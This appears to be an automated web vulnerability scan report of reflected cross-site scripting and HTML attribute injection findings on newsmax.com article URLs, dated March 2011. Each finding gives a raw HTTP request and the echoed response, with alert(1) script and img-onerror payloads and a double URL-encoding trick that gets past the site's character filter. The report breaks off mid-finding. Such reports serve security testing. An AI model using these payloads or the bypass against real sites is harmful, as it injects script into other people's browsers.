<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(38991775ff3"><img src=a onerror=alert(1)>a2bddf3f416);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21de8'%20a%3db%20a07cd9ef265 was submitted in the REST URL parameter 7. This input was echoed as 21de8' a=b a07cd9ef265 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8'%20a%3db%20a07cd9ef265 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... ors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8' a=b a07cd9ef265' class="article_tools_link"> ...[SNIP]...
1.31. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65d2a'><script>alert(1)</script>7d93cfc3716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46187 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... rs/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1' class="article_tools_link"> ...[SNIP]...
1.32. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7ca"><script>alert(1)</script>8c20879ddf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46192 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... end?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94c9a'%20a%3db%209229f875432 was submitted in the REST URL parameter 2. This input was echoed as 94c9a' a=b 9229f875432 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips94c9a'%20a%3db%209229f875432/2011/03/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:44 GMT Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19c4d'%20a%3db%20cea8d56507b was submitted in the REST URL parameter 3. This input was echoed as 19c4d' a=b cea8d56507b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/201119c4d'%20a%3db%20cea8d56507b/03/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:52 GMT Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8e50'%20a%3db%20879e713f874 was submitted in the REST URL parameter 4. This input was echoed as f8e50' a=b 879e713f874 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03f8e50'%20a%3db%20879e713f874/17/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:06 GMT Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7782c'%20a%3db%20781375d999b was submitted in the REST URL parameter 5. This input was echoed as 7782c' a=b 781375d999b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/177782c'%20a%3db%20781375d999b/id/371844 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45598 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:28 GMT Connection: close
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e65'%20a%3db%20c8f5f821c94 was submitted in the REST URL parameter 7. This input was echoed as 45e65' a=b c8f5f821c94 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65'%20a%3db%20c8f5f821c94 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41015 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65' a=b c8f5f821c94' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 was submitted in the REST URL parameter 7. This input was echoed as 7def0"><img src=a onerror=alert(1)>19683aed965 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/3718447def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41463 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3718447def0"><img src=a onerror=alert(1)>19683aed965);" class="article_tools_link"> ...[SNIP]...
1.39. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4e7"><script>alert(1)</script>650306665dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45825 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 5 Thi ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1')" class="article_tools_link"> ...[SNIP]...
1.40. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad59e'><script>alert(1)</script>63cdc65a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45820 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 5 Thi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e86'%20a%3db%20d8e0adc0dea was submitted in the REST URL parameter 2. This input was echoed as a0e86' a=b d8e0adc0dea in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86'%20a%3db%20d8e0adc0dea/2011/03/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86' a=b d8e0adc0dea/2011/03/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 816cd'%20a%3db%204633045dbf2 was submitted in the REST URL parameter 3. This input was echoed as 816cd' a=b 4633045dbf2 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd'%20a%3db%204633045dbf2/03/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd' a=b 4633045dbf2/03/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c054'%20a%3db%207544e1c0dda was submitted in the REST URL parameter 4. This input was echoed as 3c054' a=b 7544e1c0dda in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054'%20a%3db%207544e1c0dda/18/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054' a=b 7544e1c0dda/18/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b419'%20a%3db%20a7627bebbad was submitted in the REST URL parameter 5. This input was echoed as 4b419' a=b a7627bebbad in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419'%20a%3db%20a7627bebbad/id/389922 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419' a=b a7627bebbad/id/389922' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc was submitted in the REST URL parameter 7. This input was echoed as d05f4"><img src=a onerror=alert(1)>e0d02c828fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
